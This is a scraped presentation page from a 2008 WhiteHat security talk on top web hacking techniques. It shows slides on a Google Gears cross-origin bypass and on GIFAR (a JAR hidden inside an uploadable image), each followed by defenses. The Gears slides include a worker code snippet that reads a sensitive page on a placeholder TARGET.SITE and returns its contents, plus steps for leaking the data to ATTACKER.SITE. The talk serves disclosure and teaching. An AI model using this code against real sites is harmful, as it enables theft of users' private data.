Top Ten Web Hacking Techniques (2008)




             © 2009 WhiteHat, Inc. | Page 40

Recommended for you

Professzionális WLAN tervezés és minősítés
Professzionális WLAN tervezés és minősítésProfesszionális WLAN tervezés és minősítés
Professzionális WLAN tervezés és minősítés

A vezeték nélküli hálózatok tervezése kulcs fontosságú és nem kevésbé fontos annak minősítése, valamint időszakos felmérések, hatásvizsgálat elvégzése.

site-surveywifiwi-fi tervezés
Panda Security stratégia és vírusvédelmi jövőkép 2020-ig
Panda Security stratégia és vírusvédelmi jövőkép 2020-igPanda Security stratégia és vírusvédelmi jövőkép 2020-ig
Panda Security stratégia és vírusvédelmi jövőkép 2020-ig

2012 Panda Security - Sándor Zsolt eládás a CHS szoftvernapon. Már 5 éve csináljuk a Cloudot – stratégia és vírusvédelmi jövőkép 2020-ig

cloud computing securitypanda securitycloud
Top Ten Web Hacking Techniques (2008)

Defenses
Windows: Download the latest version of Safari

OS X: Versions of Safari remain un-patched by Apple.




                                                 © 2009 WhiteHat, Inc. | Page 41
Top Ten Web Hacking Techniques (2008)




Breaking Google Gears' Cross-
Origin Communication Model
Under some circumstances the cross-origin communication security model




                                                                                                         2
of Google Gears could be bypassed. An attacker could gain access to
sensitive resources of the victim in other websites (even those that does not
use Google Gears) - mainly ones that contain users' content (forums, web-
mails, social networks, office-like services, etc.).



By: Yair Amit
 http://blog.watchfire.com/wfblog/2008/12/breaking-google-gears-cross-origin-communication-model.html




                                                                                                           © 2009 WhiteHat, Inc. | Page 42
Top Ten Web Hacking Techniques (2008)


Google Gears Workers
var wp = google.gears.workerPool;
wp.allowCrossOrigin();
wp.onmessage = function(a, b, message) {
    var request = google.gears.factory.create('beta.httprequest');
    request.open('GET', 'http://TARGET.SITE/SENSITIVE_PAGE.htm');
    request.onreadystatechange = function() {
     if (request.readyState == 4) {
  wp.sendMessage(quot;The response was: quot; + request.responseText,
message.sender);
     }
    };
request.send();
}




                                                                         © 2009 WhiteHat, Inc. | Page 43
Top Ten Web Hacking Techniques (2008)


Attack Flow
 1. Attacker creates a text file that contains (malicious) Google Gears commands
(Accessing the DB, using the HttpRequest module, etc.).

2. Attacker finds a way to put the text content into a target domain (http://
TARGET.SITE/Upload/innocent.jpg). The Gears quot;workerquot; code does not contain
suspicious characters (<,>, etc...), it is therefore less likely to be filtered by http://
TARGET.SITE's server-side logic.

3. Attacker creates http://ATTACKER.SITE/attack.html which contains some Google
Gears code that loads and executes http://TARGET.SITE/Upload/innocent.jpg

4. The code embedded in innocent.jpg runs in the context of http://TARGET.SITE. It
therefore has permissions to access Google Gears client-side objects such as the
DB, the local server data or web resources (with the victim's credentials) using the
HttpRequest module built into Google Gears.

5. All information collected in the previous phase can easily be leaked back to http://
ATTACKER.SITE using Google Gears' standard messaging mechanism.



                                                                             © 2009 WhiteHat, Inc. | Page 44

Recommended for you

IPTV rendszerek diplomamunka prezentáció
IPTV rendszerek diplomamunka prezentációIPTV rendszerek diplomamunka prezentáció
IPTV rendszerek diplomamunka prezentáció
progmateltediplomamunka
Mit hoz a jövő Ramiris Szoftvernap
Mit hoz a jövő   Ramiris SzoftvernapMit hoz a jövő   Ramiris Szoftvernap
Mit hoz a jövő Ramiris Szoftvernap
cloud computing securitypanda securitycloud
Acc tutorial 9
Acc tutorial 9Acc tutorial 9
Acc tutorial 9

The document provides the trial balance and additional financial information for On-vest Software Enterprise as of January 31, 2009. It asks to prepare an income statement and balance sheet based on the information given. The income statement will show the company's revenues, expenses and net income for the year. The balance sheet will report the company's assets, liabilities and equity as of the specified date.

tutorial
Top Ten Web Hacking Techniques (2008)

Defenses

Update Google Gears.
(Content-Type header value (application/x-gears-worker)

Web developers who rely on Google Gears should be aware that the fix
might require some changes, such as creating a special rule in the Web
server for serving Google-Gears worker code files.




                                                            © 2009 WhiteHat, Inc. | Page 45
Top Ten Web Hacking Techniques (2008)




             © 2009 WhiteHat, Inc. | Page 46
Top Ten Web Hacking Techniques (2008)




GIFAR
A content ownership issue taking advantage of flimsy security controls on both the
server side and the client side. What's new is appending a Java Applet (in the form
of a JAR) at the end of another file that would be commonly allowed in file uploads




                                                                                   1
on web applications, such as images, word documents, audio/video files, just about
anything.




By: Billy Rios, Nathan McFeters, Rob Carter, and John Heasman
http://riosec.com/how-to-create-a-gifar
http://xs-sniper.com/blog/2008/12/17/sun-fixes-gifars/
http://blogs.zdnet.com/security/?p=1619




                                                                       © 2009 WhiteHat, Inc. | Page 47
Top Ten Web Hacking Techniques (2008)


How it works


      GIF


     JAR


                            © 2009 WhiteHat, Inc. | Page 48

Recommended for you

Wireless network security (in Hungarian)
Wireless network security (in Hungarian)Wireless network security (in Hungarian)
Wireless network security (in Hungarian)

This short presentation - was delivered on the D-Lan LAN Party in Dunaújváros - discusses the basic security issues of wireless networks, and gives an overview about the hacking of vulnerable networks.

wireless security
Reflective Audio Journaling
Reflective Audio JournalingReflective Audio Journaling
Reflective Audio Journaling

This document discusses reflective audio journaling (audiologs) as a way to enhance reflective learning and personal development for students. Some key points made include: - Reflective learning is enhanced through integrated audio blogging which allows students to think out loud and get feedback on their thoughts. - Effective audiologs involve exploring events in detail rather than just listing them, and committing to regular reflective journaling over time. - Social audio platforms like Audioboo allow students to easily record and share their reflections, developing a sense of community around shared audio.

edtechaudioboojournaling
Ethical hacking a licence to hack
Ethical hacking a licence to hackEthical hacking a licence to hack
Ethical hacking a licence to hack

This document discusses ethical hacking and penetration testing. It begins by defining ethical hacking and why companies hire ethical hackers to test their security systems. It then discusses how to properly plan and conduct penetration tests, including choosing testers, testing frequency, measuring results, and following security policies. Finally, it covers common hacking techniques like denial of service attacks, tools used in ethical hacking, and the goals of information security testing.

Top Ten Web Hacking Techniques (2008)

Defenses


Website:
Do not accept file uploads
Host uploaded content on throw away domains or IP addresses
Convert all content

Web Browser:
a) Disable third-party browser extensions
b) Install the latest JVM and remove older versions




                                                            © 2009 WhiteHat, Inc. | Page 49
Thank You!
Jeremiah Grossman
Blog: http://jeremiahgrossman.blogspot.com/
Twitter: http://twitter.com/jeremiahg
Email: jeremiah@whitehatsec.com

WhiteHat Security
http://www.whitehatsec.com/

More Related Content

What's hot

Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3
Oles Seheda
 
Web Security: A Primer for Developers
Web Security: A Primer for DevelopersWeb Security: A Primer for Developers
Web Security: A Primer for Developers
Mike North
 
Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
Shreeraj Shah
 
Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security Forgot
Jeremiah Grossman
 
Phishing with Super Bait
Phishing with Super BaitPhishing with Super Bait
Phishing with Super Bait
Jeremiah Grossman
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another Perspective
GreenD0g
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the Web
Mike Crabb
 
Abusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsAbusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS apps
SecuRing
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012
jakobkorherr
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Jeremiah Grossman
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
CODE BLUE
 
Sandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorageSandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorage
tomasperezv
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front end
Erlend Oftedal
 
Browser Security
Browser SecurityBrowser Security
Browser Security
Roberto Suggi Liverani
 
Web Hacking
Web HackingWeb Hacking
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must Know
Ayoma Wijethunga
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
Michael Peters
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application Defense
Frank Kim
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
Chris Shiflett
 
Java EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFishJava EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFish
Markus Eisele
 

What's hot (20)

Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3
 
Web Security: A Primer for Developers
Web Security: A Primer for DevelopersWeb Security: A Primer for Developers
Web Security: A Primer for Developers
 
Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
 
Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security Forgot
 
Phishing with Super Bait
Phishing with Super BaitPhishing with Super Bait
Phishing with Super Bait
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another Perspective
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the Web
 
Abusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsAbusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS apps
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
 
Sandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorageSandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorage
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front end
 
Browser Security
Browser SecurityBrowser Security
Browser Security
 
Web Hacking
Web HackingWeb Hacking
Web Hacking
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must Know
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application Defense
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
Java EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFishJava EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFish
 

Viewers also liked

Grow Hack Athens Pt.1: Growth Hacking For Web Apps
Grow Hack Athens Pt.1: Growth Hacking For Web AppsGrow Hack Athens Pt.1: Growth Hacking For Web Apps
Grow Hack Athens Pt.1: Growth Hacking For Web Apps
GrowthRocks
 
ethical hacking in the modern times
ethical hacking in the modern timesethical hacking in the modern times
ethical hacking in the modern times
jeshin jose
 
Ethical hacking presentation
Ethical hacking presentationEthical hacking presentation
Ethical hacking presentation
Suryansh Srivastava
 
Hacking intranet websites
Hacking intranet websitesHacking intranet websites
Hacking intranet websites
shehab najjar
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
Neel Kamal
 
Embedded device hacking Session i
Embedded device hacking Session iEmbedded device hacking Session i
Embedded device hacking Session i
Malachi Jones
 
Hacking ppt
Hacking pptHacking ppt
Hacking ppt
giridhar_sadasivuni
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its types
Sai Sakoji
 
Webinar Gratuito: "JavaScript para Hacking Web"
Webinar Gratuito: "JavaScript para Hacking Web"Webinar Gratuito: "JavaScript para Hacking Web"
Webinar Gratuito: "JavaScript para Hacking Web"
Alonso Caballero
 
Ruxmon.2015-08.-.proxenet
Ruxmon.2015-08.-.proxenetRuxmon.2015-08.-.proxenet
Ruxmon.2015-08.-.proxenet
Christophe Alladoum
 
Professzionális WLAN tervezés és minősítés
Professzionális WLAN tervezés és minősítésProfesszionális WLAN tervezés és minősítés
Professzionális WLAN tervezés és minősítés
Zsolt Kecskemeti
 
Panda Security stratégia és vírusvédelmi jövőkép 2020-ig
Panda Security stratégia és vírusvédelmi jövőkép 2020-igPanda Security stratégia és vírusvédelmi jövőkép 2020-ig
Panda Security stratégia és vírusvédelmi jövőkép 2020-ig
pandahu
 
IPTV rendszerek diplomamunka prezentáció
IPTV rendszerek diplomamunka prezentációIPTV rendszerek diplomamunka prezentáció
IPTV rendszerek diplomamunka prezentáció
Dávid Károly
 
Mit hoz a jövő Ramiris Szoftvernap
Mit hoz a jövő   Ramiris SzoftvernapMit hoz a jövő   Ramiris Szoftvernap
Mit hoz a jövő Ramiris Szoftvernap
pandahu
 
Acc tutorial 9
Acc tutorial 9Acc tutorial 9
Acc tutorial 9
Shu Shin
 
Wireless network security (in Hungarian)
Wireless network security (in Hungarian)Wireless network security (in Hungarian)
Wireless network security (in Hungarian)
Csaba Krasznay
 
Reflective Audio Journaling
Reflective Audio JournalingReflective Audio Journaling
Reflective Audio Journaling
Bernard Goldbach
 
Ethical hacking a licence to hack
Ethical hacking a licence to hackEthical hacking a licence to hack
Ethical hacking a licence to hack
amrutharam
 
Lecture 15 fraud schemes - james a. hall book chapter 3
Lecture 15  fraud schemes - james a. hall book chapter 3Lecture 15  fraud schemes - james a. hall book chapter 3
Lecture 15 fraud schemes - james a. hall book chapter 3
Habib Ullah Qamar
 

Viewers also liked (20)

Grow Hack Athens Pt.1: Growth Hacking For Web Apps
Grow Hack Athens Pt.1: Growth Hacking For Web AppsGrow Hack Athens Pt.1: Growth Hacking For Web Apps
Grow Hack Athens Pt.1: Growth Hacking For Web Apps
 
ethical hacking in the modern times
ethical hacking in the modern timesethical hacking in the modern times
ethical hacking in the modern times
 
Ethical hacking presentation
Ethical hacking presentationEthical hacking presentation
Ethical hacking presentation
 
Hacking intranet websites
Hacking intranet websitesHacking intranet websites
Hacking intranet websites
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
Embedded device hacking Session i
Embedded device hacking Session iEmbedded device hacking Session i
Embedded device hacking Session i
 
Hacking ppt
Hacking pptHacking ppt
Hacking ppt
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its types
 
Webinar Gratuito: "JavaScript para Hacking Web"
Webinar Gratuito: "JavaScript para Hacking Web"Webinar Gratuito: "JavaScript para Hacking Web"
Webinar Gratuito: "JavaScript para Hacking Web"
 
Ruxmon.2015-08.-.proxenet
Ruxmon.2015-08.-.proxenetRuxmon.2015-08.-.proxenet
Ruxmon.2015-08.-.proxenet
 
It3 4 3 2 1
It3 4 3 2 1It3 4 3 2 1
It3 4 3 2 1
 
Professzionális WLAN tervezés és minősítés
Professzionális WLAN tervezés és minősítésProfesszionális WLAN tervezés és minősítés
Professzionális WLAN tervezés és minősítés
 
Panda Security stratégia és vírusvédelmi jövőkép 2020-ig
Panda Security stratégia és vírusvédelmi jövőkép 2020-igPanda Security stratégia és vírusvédelmi jövőkép 2020-ig
Panda Security stratégia és vírusvédelmi jövőkép 2020-ig
 
IPTV rendszerek diplomamunka prezentáció
IPTV rendszerek diplomamunka prezentációIPTV rendszerek diplomamunka prezentáció
IPTV rendszerek diplomamunka prezentáció
 
Mit hoz a jövő Ramiris Szoftvernap
Mit hoz a jövő   Ramiris SzoftvernapMit hoz a jövő   Ramiris Szoftvernap
Mit hoz a jövő Ramiris Szoftvernap
 
Acc tutorial 9
Acc tutorial 9Acc tutorial 9
Acc tutorial 9
 
Wireless network security (in Hungarian)
Wireless network security (in Hungarian)Wireless network security (in Hungarian)
Wireless network security (in Hungarian)
 
Reflective Audio Journaling
Reflective Audio JournalingReflective Audio Journaling
Reflective Audio Journaling
 
Ethical hacking a licence to hack
Ethical hacking a licence to hackEthical hacking a licence to hack
Ethical hacking a licence to hack
 
Lecture 15 fraud schemes - james a. hall book chapter 3
Lecture 15  fraud schemes - james a. hall book chapter 3Lecture 15  fraud schemes - james a. hall book chapter 3
Lecture 15 fraud schemes - james a. hall book chapter 3
 

Similar to Top Ten Web Hacking Techniques (2008)

MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
Quek Lilian
 
Website security systems
Website security systemsWebsite security systems
Website security systems
Mobile88
 
4.Xss
4.Xss4.Xss
4.Xss
phanleson
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012
Matt Johansen
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Jeremiah Grossman
 
Web Security - Introduction
Web Security - IntroductionWeb Security - Introduction
Web Security - Introduction
SQALab
 
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive By Downloads:  How To Avoid Getting a Cap Popped in Your App Drive By Downloads:  How To Avoid Getting a Cap Popped in Your App
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Cenzic
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
MarketingArrowECS_CZ
 
Secure web messaging in HTML5
Secure web messaging in HTML5Secure web messaging in HTML5
Secure web messaging in HTML5
Krishna T
 
Web Application Scanning 101
Web Application Scanning 101Web Application Scanning 101
Web Application Scanning 101
Sasha Nunke
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
Shreeraj Shah
 
Hacking The World With Flash
Hacking The World With FlashHacking The World With Flash
Hacking The World With Flash
joepangus
 
TS-5358
TS-5358TS-5358
TS-5358
tutorialsruby
 
TS-5358
TS-5358TS-5358
TS-5358
tutorialsruby
 
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Shreeraj Shah
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
amiable_indian
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Security
chuckbt
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
Nahidul Kibria
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010
Aditya K Sood
 
Root via XSS
Root via XSSRoot via XSS
Root via XSS
Positive Hack Days
 

Similar to Top Ten Web Hacking Techniques (2008) (20)

MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
 
Website security systems
Website security systemsWebsite security systems
Website security systems
 
4.Xss
4.Xss4.Xss
4.Xss
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
 
Web Security - Introduction
Web Security - IntroductionWeb Security - Introduction
Web Security - Introduction
 
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive By Downloads:  How To Avoid Getting a Cap Popped in Your App Drive By Downloads:  How To Avoid Getting a Cap Popped in Your App
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Secure web messaging in HTML5
Secure web messaging in HTML5Secure web messaging in HTML5
Secure web messaging in HTML5
 
Web Application Scanning 101
Web Application Scanning 101Web Application Scanning 101
Web Application Scanning 101
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
 
Hacking The World With Flash
Hacking The World With FlashHacking The World With Flash
Hacking The World With Flash
 
TS-5358
TS-5358TS-5358
TS-5358
 
TS-5358
TS-5358TS-5358
TS-5358
 
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Security
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010
 
Root via XSS
Root via XSSRoot via XSS
Root via XSS
 

More from Jeremiah Grossman

All these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterAll these vulnerabilities, rarely matter
All these vulnerabilities, rarely matter
Jeremiah Grossman
 
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorHow to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare Sector
Jeremiah Grossman
 
The Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryThe Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare Industry
Jeremiah Grossman
 
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensExploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
Jeremiah Grossman
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
Jeremiah Grossman
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
Jeremiah Grossman
 
Next Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideNext Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers Guide
Jeremiah Grossman
 
Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?
Jeremiah Grossman
 
Ransomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowRansomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to Know
Jeremiah Grossman
 
Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016
Jeremiah Grossman
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
Jeremiah Grossman
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
Jeremiah Grossman
 
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Jeremiah Grossman
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015
Jeremiah Grossman
 
No More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesNo More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security Guarantees
Jeremiah Grossman
 
WhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedWhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report Explained
Jeremiah Grossman
 
WhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics Report
Jeremiah Grossman
 
Million Browser Botnet
Million Browser BotnetMillion Browser Botnet
Million Browser Botnet
Jeremiah Grossman
 
WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)
Jeremiah Grossman
 
WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]
Jeremiah Grossman
 

More from Jeremiah Grossman (20)

All these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterAll these vulnerabilities, rarely matter
All these vulnerabilities, rarely matter
 
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorHow to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare Sector
 
The Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryThe Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare Industry
 
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensExploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
 
Next Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideNext Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers Guide
 
Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?
 
Ransomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowRansomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to Know
 
Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
 
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015
 
No More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesNo More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security Guarantees
 
WhiteHat Security 2014 Statistics Report Explained
